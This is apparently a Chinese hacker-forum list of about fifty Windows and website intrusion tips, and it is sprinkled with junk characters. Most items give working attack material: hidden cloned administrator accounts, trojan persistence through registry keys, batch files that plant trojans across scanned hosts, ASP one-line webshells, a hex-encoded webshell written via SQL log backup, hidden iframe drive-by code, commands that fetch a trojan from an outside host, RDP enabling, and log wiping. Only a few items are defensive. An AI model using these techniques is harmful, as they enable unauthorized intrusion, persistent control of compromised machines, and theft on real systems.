Xp系统修改权限防止病毒或木马等破坏系统,cmd下,/ \% h7 H/ m- z% t$ k
cacls C:\windows\system32 /G hqw20:R% d- o: ~# N& v1 r. v: G
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入- A) P6 Y* C0 W- b8 w
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F: u' j0 H) i: j) c
! I1 S4 P n* ^9 U
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
" W/ D4 r2 D, F! V) I4 n) Z
$ \- V8 x+ M' i" t. B3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
% Q o; ^) u3 u7 a
! q* ]2 l5 i5 |4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
7 n( d& T- U2 x. t) l* o3 [; O M; S0 @4 ?# M
5、利用INF文件来修改注册表
7 c) J# K$ p/ M# ^[Version]
! E) M5 L: ~5 V- a- u0 L- V+ wSignature="$CHICAGO$"' i* `' P9 w: B
[Defaultinstall]
1 h: _ B+ h0 H- C' V& JaddREG=Ating
5 ^/ f; I; F9 G; W2 V: \$ ?! y' i7 K[Ating]) T1 v& [# i5 a0 R
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"3 U9 S" \+ i+ }& ]! f
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:2 x# N9 O) A* Q
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
: D- r; M% N* E8 t/ M: `! x' C其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
0 @: B0 j# ^& f5 T6 m( YHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
& g" I7 l. s1 B3 i8 PHKEY_CURRENT_CONFIG 简写为 HKCC
8 G# E! Y; F( J5 [" J3 z; D0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值$ S$ j3 Y0 g0 v& M
"1"这里代表是写入或删除注册表键值中的具体数据
3 Y9 b+ A5 Y8 F h$ K0 G9 b+ r) i) q" g* I
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,; y. ?5 S# |- S# ?; g' W
多了一步就是在防火墙里添加个端口,然后导出其键值
- u9 K( c# J) W& ] W2 h[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
3 F+ ~& m5 U# w, F; D+ _3 d* `8 T+ l, x
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽5 N( r9 ^: P. M. S
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。# }9 b' v) X- A2 h
7 L! T$ [( Z" v5 _, {
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
9 Z2 h+ x& S& Z2 D& K. q
1 R" X! P5 Q d+ T9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
6 g+ ?2 `9 | }- y可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。, C0 E1 \% @$ e$ m7 J* P
; l1 U* z7 e/ ~- t& m0 r7 A# p10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
( s1 T# W( m, ^0 P3 L
1 V9 M; ]+ g$ z+ l1 }11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,0 j4 ^; @" Q6 \) b* C- M
用法:xsniff –pass –hide –log pass.txt
$ P; W$ _5 N+ ~% \
. K8 ^" J( Q9 x7 T. r12、google搜索的艺术9 i) E+ Q' w) G% k
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
. v" [2 U/ q- j* E5 v或“字符串的语法错误”可以找到很多sql注入漏洞。' @5 O7 [$ N7 A6 s& F* L
7 J: J) {! {3 Q, M! k0 X
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。" ^7 g1 @! `: Z) j2 m+ J) E- J
& C, T/ k( ^$ H- V14、cmd中输入 nc –vv –l –p 19874 V* H& }5 d5 \$ `! u: ^4 ?9 H" l6 q
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃5 h/ j. C5 o1 n& d( b' c: C0 G( C
, t: I) @: @+ N @
15、制作T++木马,先写个ating.hta文件,内容为
5 ^ V1 O" v1 b4 X<script language="VBScript">, h/ l. u% S1 X4 c
set wshshell=createobject ("wscript.shell" ) z a; g/ @. @0 f
a=wshshell.run("你马的名称",1)
& a i6 u2 b# e4 v$ t$ Lwindow.close: Z; t. i" f* A# L4 j% V' T' T
</script>
2 F/ [% i. s- R) G9 l2 X+ |7 J' d. M再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
6 x, }3 f% H( _' H" A
: Q, F& O: Z1 X' L16、搜索栏里输入
0 ~, W) @6 G) B; F+ G9 `关键字%'and 1=1 and '%'='
/ [* h. G$ m4 B5 O4 B2 O关键字%'and 1=2 and '%'='7 z7 c, ~8 _1 [0 b/ {
比较不同处 可以作为注入的特征字符% b8 Q: P/ _: M( x; A. B$ b
( e3 E$ g( B" ]& k- h
17、挂马代码<html>
" f4 e" |! {; D<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
: K+ g4 \8 x3 `7 d- j</html>
/ T) k4 v1 Z. p4 `7 A- C
5 s( S4 J- l* [5 _! E9 I18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
: h! t! p* B" ^( }! i2 I3 y4 Hnet localgroup administrators还是可以看出Guest是管理员来。
* d% A7 n( M# Z2 H% u+ N: o6 D( o' T/ _ T, c! e; X
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 k1 |: o& n; o" G2 W. C- O, \用法: 安装: instsrv.exe 服务名称 路径
% Y% h7 f+ G+ l- M C9 |# _& j/ ?卸载: instsrv.exe 服务名称 REMOVE- h' q' x5 E$ w/ C0 }! G) U
5 O# @ \2 ^) t" P: D6 V4 r& z! F# R0 n# E% g% z
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉3 H% l, x; d, e
不能注入时要第一时间想到%5c暴库。
' p, b! X# K- E; s' W: H, g
6 L! |6 [" q. l) G% y22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
: {/ B" e! E+ K" Z
8 {$ B( @' C. J9 K23、缺少xp_cmdshell时
: t# X$ ` ?1 Z9 v尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
, x+ |7 f e. B. C假如恢复不成功,可以尝试直接加用户(针对开3389的)) c: _$ Y1 z' [3 z
declare @o int) R" u2 Q, j( [' J$ Y7 H t
exec sp_oacreate 'wscript.shell',@o out3 L- N- y, t9 O- }7 _- ]
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
" c# \" [3 W. j1 A! b. ?/ z9 R% H5 b. R0 m0 J8 K5 I
24.批量种植木马.bat
G- w8 q# j: }( c$ Nfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中* j5 Z. I, z7 e# C" l
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间& @# }# p1 ]5 `* G8 K3 x
扫描地址.txt里每个主机名一行 用\\开头
% }5 j/ j0 V3 k0 P6 d% R) Y
) C+ U) `8 c7 H3 l% L: p25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。) g6 p! N- [7 i
2 Z g, ? ?2 G! m& `& n7 p
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
: l) I* S+ b: j7 [* z* e+ G将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下." @/ E3 M; o* z, ^4 z- T
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
) G' M3 d. e0 I: _1 K& _
: _2 e) F4 D" a/ ]7 z27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
( f `3 z# u9 @' @ W! w然后用#clear logg和#clear line vty *删除日志, l; V9 [+ T' r; P$ `$ x
5 V/ f( p. Z+ \3 K7 S5 ^5 K4 ]
28、电脑坏了省去重新安装系统的方法. g9 K: W, D6 d
纯dos下执行,
m9 v& ~% b0 ?! h4 @# Sxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
" Z! {5 ?. y$ ?/ @5 P6 Y9 ~/ A2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
$ R, O, x+ J" A( `& o& E- m; k- i7 l" Y1 L
29、解决TCP/IP筛选 在注册表里有三处,分别是:
0 i& b6 L9 v$ v- Z0 ^HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip. F; D5 P6 p3 n' L+ b7 b
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
6 g4 I# d0 O J+ v2 e+ K! kHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
v8 y0 _. ]4 v- Y' u; G0 }# E: p分别用
- ^, g0 j; M+ C# ]* C K, mregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 _% V3 B" h' H+ K0 v# J/ M) O; Jregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip' {- M5 i1 c7 n* B' B! s6 Q
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& o, N# Z' j) m$ A' |8 ?# [命令来导出注册表项, w+ t# Z, g# q; y; x
然后把三个文件里的EnableSecurityFilters"=dword:00000001,* } I/ \4 r: x3 _. x1 A
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
/ s8 | k, s# B- R/ v$ eregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
6 B; B% N& @2 ^; X9 }
4 I+ U* T# L7 o# P/ V5 `# b& @" p30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
' t8 |$ `1 R7 J6 Y }& {# f9 a) q, bSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
6 G" L1 V* G" p5 F
& n; a% ~4 _. T7 x0 H* `31、全手工打造开3389工具0 S K. W, t8 N: o. F
打开记事本,编辑内容如下: u( [( a* _' ^7 B
echo [Components] > c:\sql
. E- R/ [( m; V, u2 X! Iecho TSEnable = on >> c:\sql H5 C; \: k2 _% R" [( _! G
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
. B5 w# s0 g% j编辑好后存为BAT文件,上传至肉鸡,执行) I0 J. E" z; C9 @# R
& K1 ~9 E8 m& g1 H
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马6 ?7 N: d8 W$ O7 K
" w+ a" q. I5 w2 n33、让服务器重启$ R) [: k, X* c6 t4 R
写个bat死循环:
$ o7 z" D- }+ N& o {+ E@echo off
; |/ l$ J3 q4 j, T! ~( S:loop1. y+ q: \& h1 ?$ G/ t' }8 ^
cls. d& O# N1 e! v
start cmd.exe7 H0 O- W% W8 s3 ~, y
goto loop1
+ _) V8 f+ }9 W" [* m2 T$ O保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启- i5 H( s! H# b( U
/ w2 B8 f- L# Y7 g4 |34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,4 j2 w' z4 ]- @$ x% |, d
@echo off
- k/ R1 o7 N3 Q! g) \9 G% F/ k0 Edate /t >c:/3389.txt) y. Q x% ~# D! m
time /t >>c:/3389.txt
4 j7 y" l, x$ @$ ]3 iattrib +s +h c:/3389.bat
! ]/ c; [& u! q# lattrib +s +h c:/3389.txt
% @( J& u9 U. Q4 cnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt/ }/ \7 @! y5 _
并保存为3389.bat
. v% @# w/ U/ |! A打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
. ~6 {+ X, H$ l$ `! V, O6 j0 X: Z. e. i2 a
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
9 c8 b! G7 a2 ]* }3 Qstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
7 ^3 u: X- @$ s6 {输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。/ x$ k5 T8 p, O x% Z+ B$ N" S
/ b7 s( Y" L3 E1 b36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件; `) w: G# z e, B5 q# G
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
6 }0 }* I* W: p/ _1 T5 u( Secho 你的FTP账号 >>c:\1.bat //输入账号
) u8 U" ^6 i; Y7 U' \echo 你的FTP密码 >>c:\1.bat //输入密码: s/ b9 E- n G" J& g6 C7 M
echo bin >>c:\1.bat //登入
: A3 f! j3 L, {7 S3 j9 F4 l+ n' decho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
8 `, M+ S+ T) C9 d3 U6 I0 x8 B5 N Fecho bye >>c:\1.bat //退出" f0 |. P$ q" Y7 V: S
然后执行ftp -s:c:\1.bat即可& x2 d& h9 @) i2 Z
9 t5 ~+ k0 [6 y9 A( z
37、修改注册表开3389两法& H6 v7 e/ [" I( R! l
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表; F" {" A: V k9 ^& n
echo Windows Registry Editor Version 5.00 >>3389.reg( A0 R/ k1 [- M8 U7 C. q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
6 }4 o, L1 X* o/ F0 Yecho "Enabled"="0" >>3389.reg6 H3 _# v8 [, {; K# K2 j2 _2 S0 L
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows; V; {& A0 l- R* r# p0 A
NT\CurrentVersion\Winlogon] >>3389.reg
p* U7 r" M2 k/ H8 Oecho "ShutdownWithoutLogon"="0" >>3389.reg( X' }' K' k. B6 p, w7 q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
" d( h! R) F0 {4 M/ h, B/ D. n- a7 z>>3389.reg
" _; q% i( \ b) c' K" d8 @3 a$ Yecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
9 k& ]7 l& h. m+ }6 `1 H; J1 Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]% b# u& y5 y0 d
>>3389.reg
, K) Q) [9 L1 \2 ^7 z$ \echo "TSEnabled"=dword:00000001 >>3389.reg |$ Y7 q( j6 X. t+ m6 }9 w! z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
' W5 p! l- ]/ l# oecho "Start"=dword:00000002 >>3389.reg
" L( b0 m) s- a( h5 P, Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
$ t( {! N& r9 i X) G# y4 T& \>>3389.reg/ H9 t. r# j" ^1 @ ~6 [. D
echo "Start"=dword:00000002 >>3389.reg
: c* T( r0 v+ N2 x! s' xecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg' f' r# c A. T; c! R
echo "Hotkey"="1" >>3389.reg
1 S; L! v/ Y3 `& W* k- @: Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% S! F! p' l7 \! K9 t) |
Server\Wds\rdpwd\Tds\tcp] >>3389.reg% F' f# M8 p9 `, z* w# I9 x X
echo "PortNumber"=dword:00000D3D >>3389.reg
1 @& `0 d. U! N$ R) j& Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 o6 N# d2 l8 h4 eServer\WinStations\RDP-Tcp] >>3389.reg2 T% m9 B, }8 M& r% u' m3 R
echo "PortNumber"=dword:00000D3D >>3389.reg- p; m% a* `1 U# D: D+ X
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。0 w3 o/ s% ]- I G& a* f m
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
# Q; [$ Y- u* }因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效* W$ [1 f8 @7 e& K
(2)winxp和win2003终端开启
; t9 K+ `0 f$ O+ H用以下ECHO代码写一个REG文件:; J4 G" `5 m8 n0 h- \3 x
echo Windows Registry Editor Version 5.00>>3389.reg
# T& v* J. [* h G6 necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 ?( l9 M2 l4 Y' Q+ P: p1 H
Server]>>3389.reg
+ H) T5 m, x Decho "fDenyTSConnections"=dword:00000000>>3389.reg1 B7 y. s2 Y. N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ Y/ `3 {7 z; y, W
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
' O- y% P* q9 _9 ] n1 H( x3 y ]echo "PortNumber"=dword:00000d3d>>3389.reg( T$ ^/ l7 v! G; o! n- D0 g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- w+ R/ ]# I0 M0 c5 hServer\WinStations\RDP-Tcp]>>3389.reg, c- k" |2 ]6 n8 a! q/ N3 e, w
echo "PortNumber"=dword:00000d3d>>3389.reg. h; d0 a) g4 \. ]
然后regedit /s 3389.reg del 3389.reg
" X% e: e, K( J* h% A. tXP下不论开终端还是改终端端口都不需重启
7 c& ~' w# y9 W( {4 X. j* T3 _7 a. f% Y$ a# I' \! O" F% n
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
* ~% L& T! p: ~! v8 h用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
6 t( r R' k0 \/ h; S Q' T- y' X: {1 j1 \( M$ J4 g: o" e1 o
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!; p- t2 Q4 t1 s! c; i
(1)数据库文件名应复杂并要有特殊字符' ?: l/ F3 g3 {
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
) N: b& c8 B& E8 R- w& [% {9 `% J5 V" i将conn.asp文档中的
o/ ^# R% t3 |* a5 L5 t1 EDBPath = Server.MapPath("数据库.mdb")
2 |; }; E5 Q! @conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath0 T G# T/ L8 n2 c3 H
* a4 G' K' r( q$ ~
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置2 I$ b0 ?1 E+ E2 G. }( U* Q
(3)不放在WEB目录里
8 ?( C. @4 V5 F3 ~' E+ p& Z: A- O! \6 r
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
/ n# c5 R# Z, c可以写两个bat文件8 Y& I$ r7 E) H% R, j
@echo off
& {! p* d) S! j, n8 A@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe' o1 I% u# [3 X* Q/ q
@del c:\winnt\system32\query.exe
9 R5 J$ I! i0 h) ~1 o( O@del %SYSTEMROOT%\system32\dllcache\query.exe7 i6 d2 v7 r2 I' F$ l- F+ G
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的$ G" T* [" o" t! A4 K! J4 g; D
! U/ h0 s/ U& V. _ m& ?
@echo off, }" I3 n3 S' q% ]
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
/ v3 W8 t+ [9 W9 ]2 J" F@del c:\winnt\system32\tsadmin.exe: u$ U J# E8 u/ \( A
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex* L& O% h4 a: ^- }+ V% l
, f3 R/ v0 F% I/ R2 v41、映射对方盘符
6 n; B4 D! U* Ltelnet到他的机器上,/ e% g6 G. d T0 k" O& ]" r0 x, W
net share 查看有没有默认共享 如果没有,那么就接着运行
3 L- f, F' }9 [& _# r% J2 lnet share c$=c: M2 k; s. m+ s1 b
net share现在有c$2 B8 ]" p7 S0 {
在自己的机器上运行& w' G, w- r: g! Y" ~6 U
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
" I: {/ ^0 d0 h2 b- P$ c7 a
7 H0 K% b+ e5 i( b3 ^& G( E- F42、一些很有用的老知识
! r; q; V* b1 K! A2 L; Stype c:\boot.ini ( 查看系统版本 )
" O3 X7 p0 z( N4 a( D+ tnet start (查看已经启动的服务)
$ Z, C# @+ Y; m- o; @6 J- _4 jquery user ( 查看当前终端连接 )4 E, D1 [4 R0 v! b' a9 Q
net user ( 查看当前用户 ). Q Q# I6 h9 u4 {( _
net user 用户 密码/add ( 建立账号 )* R+ g, t4 @- v
net localgroup administrators 用户 /add (提升某用户为管理员)
3 g$ b! H# e- T# I& v0 P! uipconfig -all ( 查看IP什么的 )
) c) S5 f6 m) m7 F9 Bnetstat -an ( 查看当前网络状态 )
; i, m3 \: p. k( Ofindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)6 Q( p' D: l, @5 F6 f
克隆时Administrator对应1F4
( H3 q5 S) M+ a. eguest对应1F51 S1 e9 w' k `. e& A5 {) S1 [) ]
tsinternetuser对应3E8
. `8 g; `' m( |, y- V( _) q
! z. C, l9 e! U, W- ~5 E3 D( y, ]43、如果对方没开3389,但是装了Remote Administrator Service+ w+ Z4 N% [; m% J
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接+ \- G, W3 R3 }8 ? R' y
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息4 H6 W3 ]" E$ c* h
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"0 s# H Z( r3 T, r
$ H) a5 a9 m5 F6 z" i. @/ `# b
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定); n u' c+ H! y' d7 O
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)" }8 [7 h) y4 P- K3 h4 D' @
U7 J) ]4 \6 |( t& v9 Y
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
' J, N' O( [1 T, Uecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
; s" l3 c, j) [# N^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
7 J: H6 C3 E" y0 C$ ?8 j/ SCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =: K) \/ K- Q8 e
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
) V, l, Z k/ @8 W, `# K(这是完整的一句话,其中没有换行符)
* C! U0 J/ I8 o8 d然后下载:+ K8 q2 I( Y: l+ I4 a
cscript down.vbs http://www.hack520.org/hack.exe hack.exe7 z) u2 H0 M# p( Q9 V9 Y
e9 z) Y4 z$ m; q# P46、一句话木马成功依赖于两个条件:
, Q% ~) o7 ?: b: A, ^1 m0 m; m+ x1、服务端没有禁止adodb.Stream或FSO组件" @# ]' A/ Z: X; F J. p0 B
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
2 ]) B3 }: B8 G# B+ y6 ?# l8 O s3 F5 X$ g+ E- T$ H
47、利用DB_OWNER权限进行手工备份一句话木马的代码:% j$ \/ |$ n) A. j! k
;alter database utsz set RECOVERY FULL--6 z' q3 ?0 D, } a! Y
;create table cmd (a image)--0 D- S' F( M6 @2 r! E n
;backup log utsz to disk = 'D:\cmd' with init--" \' j$ @+ }- A! j1 U: F
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--& b! I |& x$ |3 v4 N0 s. F
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
# f! ~$ n$ \4 n# N* r注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
6 Y- U' {/ @. C) B, E* e
- g! f1 B# M/ _* G" S6 I1 B48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:- ~3 Q' M+ _* _0 o/ ^) x1 h& m
: V) ^8 B, y$ [# s; V
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options- V; s" T9 Y+ ~; ? H# @1 ^
所有会话用 'all'。
+ ~$ G: H0 I& k6 |- i4 s. V-s sessionid 列出会话的信息。
) U9 x6 X& h3 f3 j8 z2 l-k sessionid 终止会话。
+ d# G4 ~8 \+ N' ]- y-m sessionid 发送消息到会话。
( l1 `/ _( L+ j$ B5 k6 ?/ x0 j* H3 j# a& p. w8 T7 S
config 配置 telnet 服务器参数。
1 ?5 A6 t$ m2 t5 t* o0 n. U6 Z' M" |: ?
common_options 为:* e$ W8 m' z# H2 S# P' ^ z0 b
-u user 指定要使用其凭据的用户
" A$ E S( s: B9 q, [-p password 用户密码# g* w# C m9 O" n, j0 ]
; _- D* y/ Q1 u/ s# Zconfig_options 为:
6 I: H g: j* Q* q' m3 ydom = domain 设定用户的默认域: E! |& |6 H! w) g2 B
ctrlakeymap = yes|no 设定 ALT 键的映射
. c6 y3 M8 _$ H+ `! [timeout = hh:mm:ss 设定空闲会话超时值, R8 Z2 B1 I1 H: ^ ?
timeoutactive = yes|no 启用空闲会话。
$ ^; `* g# t) [8 W4 J/ u4 _; emaxfail = attempts 设定断开前失败的登录企图数。5 b: O+ B9 V7 U8 \
maxconn = connections 设定最大连接数。, x: |& d( c& x2 ?0 \0 S
port = number 设定 telnet 端口。
1 e6 h0 L8 V$ Z! P+ s. p" f3 csec = [+/-]NTLM [+/-]passwd' x7 m* ^, B9 C/ V+ }6 K
设定身份验证机构9 x- E7 t( v1 O9 b- W' f* D
fname = file 指定审计文件名。
~3 D A; V! Y- D1 |" w$ T+ kfsize = size 指定审计文件的最大尺寸(MB)。' H* ?9 A* d* z3 |
mode = console|stream 指定操作模式。- v- i+ _2 }7 G" j0 i
auditlocation = eventlog|file|both
; L8 h: N- [8 a8 t指定记录地点" }8 [- B- S6 y3 M L
audit = [+/-]user [+/-]fail [+/-]admin
+ i& |& ]' S a2 e" E- D8 {% P$ c; i9 H, o/ x* c7 {: N* H
49、例如:在IE上访问:
+ Y, D. B' E3 J: Mwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/# V2 Q9 p1 a2 k+ y5 T" n0 H, m
hack.txt里面的代码是:/ Q- \0 \5 U6 G- R* h7 u0 w
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">: N1 T h! J5 \2 Y+ C
把这个hack.txt发到你空间就可以了!
# ?) W* U2 C* s这个可以利用来做网马哦!) r4 e7 q( d$ E: e
! U9 G9 s0 j# V* S& b b3 i50、autorun的病毒可以通过手动限制!
5 [7 e0 l! u V/ v8 Q1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
7 D. s" L4 A; ~& \' g2,打开盘符用右键打开!切忌双击盘符~
& {3 Y5 \2 l& F3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!( ]$ J" y o3 Q- [( j8 W+ C- @
! |. j, Q4 e U B
51、log备份时的一句话木马:
- I, v3 G. S% a5 y0 p' X3 ka).<%%25Execute(request("go"))%%25>
h3 @- K: H! |! _# z: S" Hb).<%Execute(request("go"))%>( I. v; `' x6 B: g/ I' U
c).%><%execute request("go")%><%4 Z( a3 w' v" b4 D" H: w9 ?8 o
d).<script language=VBScript runat=server>execute request("sb")</Script>) b$ h/ }4 t5 r, x! l4 s& N* q( A
e).<%25Execute(request("l"))%25>7 z* x& |* r: b S
f).<%if request("cmd")<>"" then execute request("pass")%>
- g4 ? ], \5 i: A
# u, Z/ V1 H2 s; A6 i1 r) y# ]52、at "12:17" /interactive cmd
, ]2 b6 \+ i- v" k5 H执行后可以用AT命令查看新加的任务: c( L; ]4 v1 j% w q6 v
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
& y- ~# L. B7 w' L6 u" K6 S7 z* a/ f
5 u) Y: i8 b2 ~5 N7 Y4 F o53、隐藏ASP后门的两种方法
; D; ?# m U; k; D1、建立非标准目录:mkdir images..\
